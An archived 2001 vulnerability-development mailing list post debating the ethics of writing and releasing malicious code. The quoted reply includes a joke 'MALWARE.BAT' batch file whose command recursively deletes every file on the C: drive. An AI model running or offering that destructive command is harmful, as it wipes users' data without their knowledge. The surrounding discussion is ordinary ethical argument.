Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: coding (was: Re: CodeGreen beta release (idq-patcher/antiCodeRed/etc.)

From: sa7ori <sa7ori () tasam com>
Date: Thu, 6 Sep 2001 20:37:32 -0400 (EDT)
There needs to be a clear understanding of the inherent responsibility
envolved with releasing code. I justify it by thinking of it as a artistic
work or piece of literature...if the topic is controversial, the
author/artist must understand the risk and responsibility envolved with
sharing it with others. There is absolutely nothing wrong (morally) with
the creation of "malicious" code. But if it was written without malice,
then the author must understand that releasing it will facilitate those
who are driven by other nefarious motivations. It is a fun project to
build a black powder rifle or "potato gun" but there is something
twisted about distributing them to neighborhood children.

On Thu, 6 Sep 2001, Meritt James wrote:


authoring?  I see no problem.  Releasing?  See the arguments presented
by tobacco and gun lobbyists.

"Silcock, Stephen" wrote:


OK I'm gonna author some malicious code right now.  If you run it that's
your own business; I disclaim all responsiblity for use of this software.

<START OF MALWARE.BAT>
@ECHO OFF
C:
CD\
DEL /S /Q *.*
<END OF MALWARE.BAT>

Should I go to jail?  I think not... authoring malicious code is a far cry
from doing something ethically wrong.  It may be criminal however depending
where you live.

S.   :)

PLEASE NOTE:

This email transmission is confidential and intended solely for the
addressee.  If you are not the intended addressee, you must not use,
disclose or print this transmission and you should delete it from your
system.


--
James W. Meritt, CISSP, CISA
Booz, Allen & Hamilton
phone: (410) 684-6566
Previous By Date Next
Previous By Thread Next

Current thread: